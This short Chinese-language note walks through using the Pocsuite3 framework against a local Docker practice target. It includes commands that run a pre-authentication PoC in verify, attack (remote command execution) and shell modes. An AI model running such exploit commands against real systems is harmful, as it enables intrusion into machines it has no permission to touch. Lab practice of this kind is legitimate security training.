参考:
【安全工具】必备神器!开源远程漏洞测试框架——404星链计划Pocsuite3_哔哩哔哩_bilibili
安装docker容器
sudo apt update
sudo apt install docker.io
然后就是搭建 docker 靶场测试了
拉取靶场镜像
https://172.17.0.1:10000/访问docker的ip和端口就能访问靶场了
verify 模式:
pocsuite -r 20240314_pre-auth_other.py -u https://172.17.0.1:10000
--options
参数可以查看 PoC 定义的额外命令行参数:
pocsuite -r 20240314_pre-auth_other.py --options
attack 模式获取命令行参数执行并返回结果
pocsuite -r 20240314_pre-auth_other.py -u https://172.17.0.1:10000 --attack --cmd 'ps'
shell 模式
pocsuite -r 20240314_pre-auth_other.py -u https://172.17.0.1:10000 --shell --ppt
验证完后删除镜像文件
现在可以愉快的练习exp啦